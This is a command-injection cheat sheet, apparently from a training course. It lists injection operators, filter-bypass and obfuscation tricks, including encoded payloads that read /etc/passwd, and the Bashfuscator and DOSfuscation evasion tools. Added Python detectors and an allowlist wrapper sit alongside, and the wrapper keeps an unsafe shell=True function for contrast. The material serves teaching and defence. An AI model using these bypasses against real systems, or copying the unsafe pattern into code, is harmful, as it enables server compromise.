Command Injection

Command Injection Methods

| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
|---|---|---|---|
| Semicolon | `;` | `%3b` | Both |
| New Line | `\n` | `%0a` | Both |
| Background | `&` | `%26` | Both (second output generally shown first) |
| Pipe | `\|` | `%7c` | Both (only second output is shown) |
| AND | `&&` | `%26%26` | Both (only if first succeeds) |
| OR | `\|\|` | `%7c%7c` | Second (only if first fails) |
| Sub-Shell | ``` `` ``` | `%60%60` | Both (Linux-only) |
| Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) |
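
An added detection example (not part of the cheat sheet) that applies the table above to URL-encoded parameter values: it decodes each value once, as a web server would, names the operators it finds, and flags values that are still percent-encoded after that pass (double encoding, one of the checks listed under Prevention). The parameter name `ip`, the function names and the sample query strings are constructed for this example.

```python
"""Detect injection operators in URL-encoded request parameters.

Added example (not part of the original cheat sheet). It decodes a query
string the way a web server would and reports which operators from the
table above appear in each parameter value, plus values that are still
percent-encoded after one decoding pass (double encoding). The sample
queries at the bottom are constructed for this example.
"""
from __future__ import annotations
import re
from urllib.parse import unquote, unquote_plus

# Operators from the table above. Order matters: multi-character tokens are
# checked first so "&&" is reported as AND, not as two Background operators.
OPERATORS = {
    "&&": "AND",
    "||": "OR",
    ";": "Semicolon",
    "\n": "New Line",
    "&": "Background",
    "|": "Pipe",
    "`": "Sub-Shell (backticks)",
    "$(": "Sub-Shell $()",
}

PCT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")


def find_operators(value: str) -> list[str]:
    """Return the operator names present in an already-decoded value."""
    found = []
    remaining = value
    for token, name in OPERATORS.items():
        if token in remaining:
            found.append(name)
            remaining = remaining.replace(token, " ")  # consume so "&&" is not also "&"
    return found


def is_double_encoded(raw_value: str) -> bool:
    """True when one decoding pass still leaves %XX escapes (e.g. %253b -> %3b)."""
    once = unquote(raw_value)
    return once != raw_value and PCT_ESCAPE.search(once) is not None


def scan_query(query: str) -> dict[str, list[str]]:
    """Scan a raw (still encoded) query string.

    Returns {parameter: [findings]} containing only the suspicious parameters.
    Splitting on the literal '&' first mirrors server-side parsing: an encoded
    %26 stays inside the value and is only seen after decoding.
    """
    report: dict[str, list[str]] = {}
    for pair in query.split("&"):
        name, _, raw_value = pair.partition("=")
        findings = find_operators(unquote_plus(raw_value))
        if is_double_encoded(raw_value):
            findings.append("double-encoded")
        if findings:
            report[unquote_plus(name)] = findings
    return report


# Constructed sample query strings; the values carry the URL-encoded operators from the table.
SAMPLE_QUERIES = [
    "ip=127.0.0.1",
    "ip=127.0.0.1%3bwhoami",
    "ip=127.0.0.1%26%26whoami",
    "ip=127.0.0.1%7c%7cwhoami",
    "ip=127.0.0.1%0awhoami",
    "ip=127.0.0.1%24%28whoami%29",
    "ip=127.0.0.1%253bwhoami",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(f"{q:32} -> {scan_query(q) or 'clean'}")
```

The only subtle part is the ordering in `OPERATORS`: each multi-character token is consumed before its single-character prefix is checked, so `&&` yields one AND finding rather than AND plus Background. The double-encoding check looks at the raw value before decoding, which is why the function splits the query itself instead of using `parse_qsl`.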
Other Injection Operators

| Injection Type | Operators |
|---|---|
| SQL Injection | `'` `,` `;` `--` `/* */` |
| Command Injection | `;` `&&` |
| LDAP Injection | `*` `(` `)` `&` `\|` |
| XPath Injection | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection | `;` `&` `\|` |
| Code Injection | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^` |
| Directory Traversal/File Path Traversal | `../` `..\\` `%00` |
| Object Injection | `;` `&` `\|` |
| XQuery Injection | `'` `;` `--` `/* */` |
| Shellcode Injection | `\x` `\u` `%u` `%n` |
| Header Injection | `\r` `%0d` `%0a` `%09` |
Bypass

Space

| Technique | Example |
|---|---|
| Tab instead of a space | `%09` |
| `$IFS` shell variable (expands to whitespace) | `${IFS}` |
| Brace expansion | `{ls,-la}` |
Other Blacklisted Characters

Linux

```
$ echo ${PATH:0:1}        # first character of $PATH
/
$ echo ${LS_COLORS:10:1}  # eleventh character of $LS_COLORS
;
```

Windows

```
C:\htb> echo %HOMEPATH:~6,-11%
\
PS C:\htb> $env:HOMEPATH[0]
\
```

Character Shifting

```
$ man ascii # \ is on 92, before it is [ on 91
$ echo $(tr '!-}' '"-~'<<<[)   # shift every character up by one: [ becomes \
\
```

Blacklisted Commands

Linux & Windows

```
$ w'h'o'am'i   # quotes are removed by the shell before the command name is resolved
$ w"h"o"am"i
```

Linux Only

```
$ who$@ami     # $@ expands to nothing when there are no positional parameters
$ w\ho\am\i    # a backslash before an ordinary character is dropped
```

Windows Only

```
C:\htb> who^ami   # ^ is the cmd.exe escape character and is dropped
```
Advanced Command Obfuscation

Case Manipulation

```
PS C:\htb> WhOaMi
$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$ $(a="WhOaMi";printf %s "${a,,}")
```

Reversed Commands

```
PS C:\htb> iex "$('imaohw'[-1..-20] -join '')"
$ $(rev<<<'imaohw')
```

Encoded Commands

```
PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
$ echo -n 'cat /etc/passwd | grep 33' | base64
$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```
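
Every trick listed under Bypass and Advanced Command Obfuscation falls away if a detector canonicalizes the string before matching it. The normalizer below is an added example, not code from the cheat sheet or from any of the tools it mentions; the watched command list, the regular expressions, the function names and the sample strings are its own assumptions. Base64 blobs are decoded before lowercasing (the PowerShell `FromBase64String` input is UTF-16LE, the bash one UTF-8), and words reversed with `rev<<<` or the PowerShell `[-1..-N]` slice are un-reversed and appended, so the real command name appears as a plain token.

```python
"""Normalize obfuscated command strings before matching them.

Added example (not from the original cheat sheet). Given a decoded request
value, it strips the obfuscation layers listed above (inserted quotes,
backslash/caret escapes, $@ splitting, case changes, reversal, base64
encoding, ${IFS} and brace expansion) and then matches the canonical form
against a small list of command names. The watched command list, the
regexes and the samples are this example's own constructions.
"""
from __future__ import annotations
import base64
import re

WATCHED_COMMANDS = {"whoami", "cat", "bash", "ls"}   # assumption: names to alert on

B64_MARKER = re.compile(r"base64\s+(?:-d|--decode)|frombase64string", re.IGNORECASE)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
REV_HERESTRING = re.compile(r"\brev\s*<<<\s*(\w+)")       # rev<<<imaohw
PS_REVERSE = re.compile(r"(\w+)\[-1\.\.-\d+\]")            # imaohw[-1..-20]
BRACE_EXPANSION = re.compile(r"\{([^{}]*,[^{}]*)\}")      # {ls,-la}
INSERTED_ESCAPES = re.compile(r"""['"\\^]|\$@""")         # w'h'o"am"i  w\ho\ami  who^ami  who$@ami


def _decode_base64_blobs(text: str) -> list[str]:
    """Decode base64-looking tokens; PowerShell encodes UTF-16LE, bash UTF-8."""
    decoded = []
    for match in B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            blob = raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
        except ValueError:   # binascii.Error and UnicodeDecodeError both subclass it
            continue
        if blob and blob.isprintable():
            decoded.append(blob)
    return decoded


def normalize(text: str, depth: int = 0) -> str:
    """Return a lowercase canonical form with the obfuscation layers undone."""
    s = INSERTED_ESCAPES.sub("", text)
    expansions = [s]
    if depth < 2 and B64_MARKER.search(s):                 # decode before lowercasing
        expansions += [normalize(b, depth + 1) for b in _decode_base64_blobs(s)]
    for pattern in (REV_HERESTRING, PS_REVERSE):           # append the un-reversed word
        expansions += [m.group(1)[::-1] for m in pattern.finditer(s)]
    s = " ".join(expansions)
    s = BRACE_EXPANSION.sub(lambda m: m.group(1).replace(",", " "), s)
    s = s.replace("${IFS}", " ").replace("\t", " ")
    return re.sub(r"\s+", " ", s).strip().lower()


def detect(text: str) -> list[str]:
    """Watched command names found in the normalized form, sorted."""
    tokens = set(re.findall(r"[a-z0-9_-]+", normalize(text)))
    return sorted(tokens & WATCHED_COMMANDS)


# Constructed samples: the obfuscated forms listed above, as a server would see them.
SAMPLES = {
    "quoted": "w'h'o'am'i",
    "positional": "who$@ami",
    "caret": "who^ami",
    "case": '$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")',
    "reversed": "$(rev<<<'imaohw')",
    "powershell_reversed": "iex \"$('imaohw'[-1..-20] -join '')\"",
    "powershell_base64": "iex \"$([System.Text.Encoding]::Unicode.GetString("
                         "[System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))\"",
    "bash_base64": "bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)",
    "benign": "ping -c 1 127.0.0.1",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:20} {detect(value) or 'no watched command'}")
```

Run it directly and each sample line reports the command name hidden inside it, while the benign string reports nothing. The depth limit on base64 decoding keeps a nested payload from recursing indefinitely, and the `isprintable()` check discards ordinary words that happen to look like base64.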
More Payloads
Evasion Tools

Linux (Bashfuscator)

Installation

```
$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ python3 setup.py install --user
```

Usage

```
$ cd ./bashfuscator/bin/
$ ./bashfuscator -h
$ ./bashfuscator -c 'cat /etc/passwd'
$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
```

Windows (DOSfuscation)

Installation

```
PS C:\htb> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\htb> cd Invoke-DOSfuscation
PS C:\htb> Import-Module .\Invoke-DOSfuscation.psd1
```

Usage

```
PS C:\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1
```
Prevention

- Avoid executing system commands
- Input validation on both front-end and back-end
- Input sanitization
- Server configuration:
  - use a WAF
  - apply the principle of least privilege (run the web server as `www-data`, for example)
  - `open_basedir = '/var/www/html'`
  - reject double-encoded requests and non-ASCII characters in URLs
- Avoid the use of sensitive/outdated libraries and modules
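
An added example of the first three prevention items together (not code from the cheat sheet): validation by allowlist rather than by filtering out characters, and, where a system command really is needed, passing the value as a single argv element with no shell in between. The `ping` wrapper, `HOST_RE`, the function names and the sample hosts are assumptions of this example.

```python
"""Validate input and avoid the shell when a system command is unavoidable.

Added example (not from the original cheat sheet): a ping wrapper for the
classic "host" parameter. The allowlist regex, function names and sample
values are this example's own assumptions.
"""
from __future__ import annotations
import re
import subprocess

_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# Allowlist: a dotted-quad IPv4 address or a DNS hostname. Nothing else is
# accepted, so every operator in the table above (; & | ` $ newline) and the
# space substitutes (${IFS}, %09, {a,b}) fail validation instead of being filtered.
HOST_RE = re.compile(rf"^(?:{_OCTET}(?:\.{_OCTET}){{3}}|(?:{_LABEL}\.)*{_LABEL})$")


def is_safe_host(value: str) -> bool:
    """Allowlist check: validate the whole value, do not try to sanitize it."""
    return len(value) <= 253 and HOST_RE.fullmatch(value) is not None


def build_ping_command(host: str) -> list[str]:
    """argv list for ping. With no shell involved, host is one literal argument
    and can never be parsed as a second command."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def ping_host(host: str) -> int:
    """Hardened execution: validated input, argv list, shell=False, a timeout."""
    result = subprocess.run(build_ping_command(host), shell=False,
                            capture_output=True, timeout=10)
    return result.returncode


def ping_host_unsafe(host: str) -> int:
    """The pattern to avoid, kept only for contrast: the value is interpolated
    into a shell command line, so every operator in the table is honoured."""
    return subprocess.run(f"ping -c 1 {host}", shell=True).returncode


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "example.com", "127.0.0.1;whoami", "127.0.0.1${IFS}whoami"]:
        print(f"{candidate:28} {'accepted' if is_safe_host(candidate) else 'rejected'}")
```

The regex is deliberately an allowlist: it describes the only shapes a host may take, so a new bypass character does not need a new blocklist entry. `build_ping_command` is the piece worth unit-testing in a real code base, because it is where a later refactor could quietly reintroduce `shell=True`.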